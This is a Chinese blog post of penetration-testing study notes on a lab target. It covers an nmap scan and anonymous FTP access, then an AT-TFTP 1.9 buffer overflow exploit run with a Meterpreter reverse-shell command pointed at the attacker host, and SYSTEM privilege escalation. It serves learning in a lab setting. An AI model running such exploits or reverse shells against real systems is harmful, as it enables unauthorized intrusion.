博客
关于我
渗透测试学习笔记之案例五
阅读量:145 次
发布时间:2019-02-28

本文共 781 字,大约阅读时间需要 2 分钟。

0x00 前言

今天这篇文章将分享一个渗透测试中的实际案例,展示从信息收集到最终获得目标主机控制的完整过程。

0x01 案例分析

实验环境

  • 目标靶机:10.11.1.0/24
  • 攻击机:Kali Linux(10.11.0.74)

渗透过程

开始进行服务和端口扫描:

# nmap -sT -Pn 10.11.1.226

扫描结果显示目标主机开放了ftp和RDP服务。初步测试发现,ftp服务支持匿名登录。

通过ftp服务,我们发现并下载了一个名为servers.py的Python脚本。进一步分析发现,该脚本用于启动ftp和tftp服务,具体涉及以下操作:

# cat servers.pyimport wmi, time, ftplib, tftpy

发现tftp漏洞

通过Google搜索,我们发现AT-TFTP 1.9存在一个缓冲区溢出漏洞(RCE)。利用Meterpreter反弹shell的生成工具,替换脚本中的shellcode代码,并运行:

# python atftp.py 10.11.1.226 69 10.11.0.74 9

最终,我们成功获得了一个Meterpreter反弹shell。

通过msf的反弹shell处理程序,迁移并提权至SYSTEM权限,完成渗透目标。

0x02 小结

该案例的渗透思路总结如下:

  • 服务和端口扫描:首先发现目标主机开放了ftp服务,并进一步确认tftp服务的存在。
  • 脚本分析:通过ftp下载并分析servers.py脚本,发现其用于启动ftp和tftp服务。
  • 漏洞利用:利用AT-TFTP 1.9的缓冲区溢出漏洞,生成Meterpreter反弹shell。
  • 反弹shell提权:通过msf反弹shell迁移进程并提权至SYSTEM权限。
  • 该案例展示了如何通过合理利用现有信息和漏洞,逐步实现渗透测试的目标。

    转载地址:http://cfgc.baihongyu.com/

    你可能感兴趣的文章
    Objective-C实现单向链表的反转(附完整源码)
    查看>>
    Objective-C实现压缩文件夹(附完整源码)
    查看>>
    Objective-C实现图书借阅系统(附完整源码)
    查看>>
    Objective-C实现图片的放大缩小(附完整源码)
    查看>>
    Objective-C实现均值滤波(附完整源码)
    查看>>
    Objective-C实现域名转IP(附完整源码)
    查看>>
    Objective-C实现基于 LIFO的堆栈算法(附完整源码)
    查看>>
    Objective-C实现基于 LinkedList 的添加两个数字的解决方案算法(附完整源码)
    查看>>
    Objective-C实现基于事件对象实现线程同步(附完整源码)
    查看>>
    Objective-C实现基于文件流拷贝文件(附完整源码)
    查看>>
    Objective-C实现多组输入(附完整源码)
    查看>>
    Objective-C实现字符串manacher马拉车算法(附完整源码)
    查看>>
    Objective-C实现字符串wildcard pattern matching通配符模式匹配算法(附完整源码)
    查看>>
    Objective-C实现字符串word patterns单词模式算法(附完整源码)
    查看>>
    Objective-C实现将彩色图像转换为负片算法(附完整源码)
    查看>>
    Objective-C实现将给定的 utf-8 字符串编码为 base-16算法(附完整源码)
    查看>>
    Objective-C实现数除以二divideByTwo算法(附完整源码)
    查看>>
    Objective-C实现文件的删除、复制与重命名操作实例(附完整源码)
    查看>>
    Objective-C实现是否为 Pythagoreantriplet 毕氏三元数组算法(附完整源码)
    查看>>
    Objective-C实现显示响应算法(附完整源码)
    查看>>